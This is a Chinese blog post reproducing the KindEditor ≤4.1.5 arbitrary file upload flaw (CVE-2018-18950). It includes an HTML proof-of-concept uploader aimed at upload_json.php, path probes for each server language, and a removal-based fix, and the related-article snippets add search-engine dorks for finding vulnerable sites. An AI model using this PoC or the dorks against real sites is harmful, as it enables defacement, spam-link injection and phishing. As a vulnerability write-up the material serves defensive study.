KindEditor文件上传漏洞(CVE-2018-18950)

于 2024-01-03 17:18:58 发布
阅读量2k 收藏 8
点赞数 9
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135368686
版权
本文描述了KindEditor4.1.5编辑器中的文件上传漏洞,攻击者可以通过恶意HTML文件上传.txt和.html文件,进行钓鱼攻击。复现步骤包括查看版本、构造POC和使用CURL。修复建议是删除upload_json.和file_manager_json.文件。
摘要由CSDN通过智能技术生成

漏洞描述:

漏洞存在于小于等于kindeditor4.1.5 编辑器里,你能上传.txt和 .html文件,支持php/asp/jsp/asp.net。 /php/upload_json.php文件不会清理用户输入或者检查用户是否将任意文件上传到系统。通过构造一个恶意的 html文件来实现跳转,钓鱼等,恶意攻击者可实现。

复现过程:

1.访问ip;port

2.查看版本信息

/kindeditor.js

小于kindeditor4.1.5 ,证明存在文件上传漏洞

3.访问文件上传页面

4.进行尝试如下路径是否存在有必要验证文件 upload_json.*,常见判断路径如下:

​/asp/upload_json.asp?dir=file

​/asp.net/upload_json.ashx?dir=file

​/jsp/upload_json.jsp?dir=file

​/php/upload_json.php?dir=file

证明系统的语言为php

5.构造POC或者CURL提交文件。这次采用构造 POC,url替换为攻击url。

<html><head>

    <title>Uploader</title>

    <script src="http://ip:port/kindeditor.js"></script>

    <script>        KindEditor.ready(function (K) {            var uploadbutton = K.uploadbutton({                button: K('#uploadButton')[0],                fieldName: 'imgFile',                url: 'http://ip:port/php/upload_json.php?dir=file',                afterUpload: function (data) {                    if (data.error === 0) {                        var url = K.formatUrl(data.url, 'absolute');                        K('#url').val(url);                    }                },            });            uploadbutton.fileBox.change(function (e) {                uploadbutton.submit();            });        });    </script></head><body>

<div class="upload">

    <input class="ke-input-text" type="text" id="url" value="" readonly=“readonly”/>

    <input type="button" id="uploadButton" value="Upload"/>

</div>

</body>

</html>

​​​​​​​6.访问html文件如下

7.抓包,上传txt文件,获取返回路径

8.访问上传文件,发现成功上传

9.同时也可以上传.html文件

这就是攻击者最喜欢上传的文件(里面包含了各种暗页连接地址,如菠菜和其他色情站点链接地址)

修复建议:

1.直接删除upload_json.和file_manager_json.即可

慕筱蚺
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Kindeditor上传漏洞复现(CVE-2017-1002024)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-09 3303
Kindeditor上传漏洞复现(CVE-2017-1002024) 文章目录Kindeditor上传漏洞复现(CVE-2017-1002024)1. 漏洞简述2. 组件概述3. 漏洞原理4. 漏洞复现5. 漏洞验证5. 漏洞修复意见 复现环境土豪专用下载链接 https://download.csdn.net/download/qin9800/18510863 1. 漏洞简述 漏洞名称:Kindeditor上传漏洞 漏洞编号:CVE-2017-1002024 漏洞影响:黑页、钓鱼、XSS等 基础权限
漏洞挖掘 | 编辑器漏洞kindeditor
最新发布
hackzkaq的博客
02-20 2041
可能手法比较老,毕竟也不能否定他的存在。渗透测试的核心讲究测试嘛。希望这篇文章对一直探索的我们有所帮助。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等应急响应笔记学习路线。
KindEditor 上传漏洞致近百个党政机关网站遭植入
weixin_33906657的博客
02-23 208
百度智能云 云生态狂欢季 热门云产品1折起>>> 2月21日消息,近日,安恒明鉴网站安全监测平台和应...
KindEditor 文件上传漏洞验证
LiBai'S BLOG
09-30 2448
KindEditor 文件上传漏洞漏洞描述影响范围漏洞验证1.查看版本信息2.漏洞验证漏洞修复 漏洞描述 漏洞存在于KindEditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中。 这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面,直接POST到/upload_json.*?dir=file,在允许上传的文件扩展名中包含htm
KindEditor 4.1.10 (2013-11-23)
12-03
KindEditor ASP.NET 本ASP.NET程序是演示程序,建议不要直接在实际项目中使用。 如果您确定直接使用本程序,使用之前请仔细确认相关安全设置。 使用方法: 1. 解压zip文件,将所有文件复制到IIS的wwwroot/kindeditor目录下。 2. 将kindeditor/asp.net/bin目录下的dll文件复制到wwwroot/bin目录下。 3. 打开浏览器,输入http://localhost:[P0RT]/kindeditor/asp.net/demo.aspx。
Ueditor、FCKeditor、Kindeditor编辑器漏洞
网安君的博客
01-27 6460
UEditor是由百度web前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点。Ueditor、FCKeditor、Kindeditor编辑器漏洞
KindEditor 文件上传漏洞漏洞
热门推荐
mei_13的博客
07-31 1万+
1 漏洞简介 1.1 漏洞描述 KindEditor是一套开源的HTML可视化编辑器,使用JavaScript编写,支持asp、aspx、php、jsp,几乎支持了所有的网站,该编辑器主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器,非常适合在CMS、商城、论坛、博客、Wiki、电子邮件等互联网应用上使用。且该编辑器支持上传功能,如果上传文件类型控制的不好,那么我们就能利用该漏洞,上传doc,docx,xls,xlsx,ppt,h
kindeditor编辑器文件上传漏洞
shy的博客
03-12 3955
kindeditor编辑器版本小于4.1.5存在文件上传漏洞,可利用该漏洞上次网页、文本文件,可网站进行篡改,添加赌博、反共等违法信息。 通过扫描器发现该网站存在编辑器。 通过浏览器访问,确定该编辑器为kindeditor编辑器。 确定该编辑器的版本小于4.1.5,存在文件上传漏洞。 构造文件上传漏洞利用脚本kindeditor.html。 <html><head> <title>Uploader</title> <s
网站安全检测被 提示该网站内容被禁止访问
网站安全专家
05-11 1752
很多建站公司都在使用Kindeditor开源的图片上传系统,该上传系统是可视化的,采用的开发语言支持asp、aspx、php、jsp,几乎支持了所有的网站可以使用他们的上传系统,对浏览器的兼容以及手机端也是比较不错的,用户使用以及编辑上传方面得到了很多用户的喜欢。 前端时间我们SINE安全对其进行全面的网站漏洞检测的时候发现,Kindeditor存在严重的上传漏洞,很多公司网站,以及事业单位的网...
kindeditor上传漏洞复现(CVE-2017-1002024)
qq_34853514的博客
08-09 3838
漏洞简介 漏洞编号: CVE-2017-1002024 漏洞详情: KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,在于小于等于kindeditor4.1.12 编辑器里,可以上传.txt和.html文件,支持php/asp/jsp/asp.net。 漏洞影响范围: kindeditor<=4.1.11 漏洞原理: upload_json.*中代码并没有对用户上传的文件格式,以及大小进行安全检测,导致用户可以伪造恶意文件进行上传,尤其html文件可以
kindeditor-4.1.11-zh-中文.zip
12-06
KindEditor 是一套开源的在线HTML编辑器,主要用于让用户在网站上获得所见即所得编辑效果,开发人员可以用 KindEditor 把传统的多行文本输入框(textarea)替换为可视化的富文本输入框。 KindEditor 使用 JavaScript ...
kindeditor-4.1.11-zh-CN插件及api文档
12-22
6. **异步上传**:编辑器内嵌的图片和文件上传功能通常是异步的,这意味着用户可以在不刷新页面的情况下上传文件,并且可以设置上传的参数,如文件类型、大小限制等。 7. **事件处理**:通过绑定各种编辑器事件,如...
kindeditor-4.1.11-zh-CN
04-06
1. `js` 文件夹:存放JavaScript源码,这是编辑器的核心部分,包括主脚本文件(如`kindeditor.js`)、插件和语言包。 2. `css` 文件夹:包含编辑器的样式表,定义了编辑器的外观和布局。 3. `images` 文件夹:存储...
kindeditor--4.1.12 解决flash批量上传图片按钮不显示与支持video视频
06-14
3. **KindEditor配置问题**:检查KindEditor的配置文件(通常为`config.js`),确保批量上传图片的选项已正确开启。比如,`items`数组中应该包含'uploadimage', 'multiimage'等项。 4. **Flash上传脚本问题**:确认...
kindeditor漏洞_【漏洞预警】KindEditor文件上传漏洞
weixin_28977123的博客
12-25 1251
KindEditor信息:KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。漏洞编号:CVE-2017-1002024漏洞描述:Web应用程序KindEditor v4.1.12及之前版本中的kindeditor/php/upload_json.php页面代码在...
kindeditor php 漏洞,KindEditor漏洞、优化以及漏洞、BUG修复方案汇总
weixin_39772651的博客
03-22 1800
Kindeditor漏洞 编辑代码内容被执行kindeditor漏洞描述:在kindeditor编辑代码添加到数据库时没有任何问题,也就是一些HTML代码不会被执行,例如:web编程,这样的代码在首次编辑的时候没有被执行。但是,从数据库里取出来再放到kindeditor里进行修改的时候问题就出现了,这行HTML代码被执行了,结果这样:web编程 变成了超链接的形式。解决办法:先看下面这张图这张图是...
kindeditor编辑器<=4.1.5上传漏洞复现
p_utao的博客
12-11 1073
前期 谷歌语法搜索 inurl:/examples/uploadbutton.html inurl:/php/upload_json.php inurl:/asp.net/upload_json.ashx inurl://jsp/upload_json.jsp inurl://asp/upload_json.asp inurl:gov.cn/kindeditor/ 首先一定要看脚本语言,对症下药 /asp/upload_json.asp /asp.net/upload_json.ashx /
常见编辑器漏洞汇总【超全】(转载)
00勇士王子的博客
09-15 5113
以前挖某站发现使用了编辑器,想用通用漏洞探一探,奈何当时无从下手,这件事就放到了我的心上,就去学习了此方面的知识,了解了一些思路,把编辑器漏洞汇总到了一起,分享给想要了解这方面漏洞的小伙伴首先介绍什么是编辑器:编辑器是非常好用的网页在线编辑器,顾名思义就是让我们的用户可以在网页上进行文本的编辑,可以在网页上设置字体的样式段落行间距类似于用word编辑比较方便,并将工具生成得到的html样式插入到数据库中我们可以右键,审查元素,查看js 文件和文件内容标识。
kindeditor 任意文件上传
07-27
对于 KindEditor 的任意文件上传漏洞,可以采取以下步骤进行防护: 1. 更新到最新版本:及时更新 KindEditor 到最新版本,以确保修复了已知的漏洞。 2. 文件类型白名单:在服务器端进行文件类型白名单限制,只允许上传特定的安全文件类型,并禁止上传可执行文件、脚本文件等危险文件类型。 3. 文件大小限制:限制上传文件的大小,控制上传文件的大小范围,以防止恶意用户上传过大的文件导致服务器资源耗尽。 4. 文件后缀检查:检查文件后缀是否与实际文件类型一致,避免恶意用户通过修改文件后缀绕过文件类型限制。 5. 文件内容检查:对上传的文件进行内容检查,使用杀毒软件或者自定义规则对上传的文件进行扫描,确保上传的文件没有包含恶意代码。 6. 临时文件处理:将上传的文件保存在非 Web 可访问目录下,并限制访问权限,防止用户直接访问上传的文件。 7. 强制下载:在返回上传成功的链接时,强制浏览器将其当做下载文件处理,而不是直接在浏览器中打开。 8. 日志监控:监控系统日志,及时发现异常行为,并及时采取相应的防护措施。 请注意,以上措施只是一些基本的防护措施,具体的防护策略需要根据实际需求和系统环境来确定。同时,建议定期对系统进行安全审计和漏洞扫描,及时修补已知漏洞
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值